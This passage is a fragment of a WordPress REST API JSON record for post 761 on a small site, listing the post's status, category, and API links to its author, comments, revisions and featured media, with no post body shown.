w&hellip;<\/p>\n","protected":false},"author":1,"featured_media":29,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-761","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts\/761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=761"}],"version-history":[{"count":0,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/posts\/761\/revisions"}],"
wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=\/wp\/v2\/media\/29"}],"wp:attachment":[{"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/connectword.dpdns.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}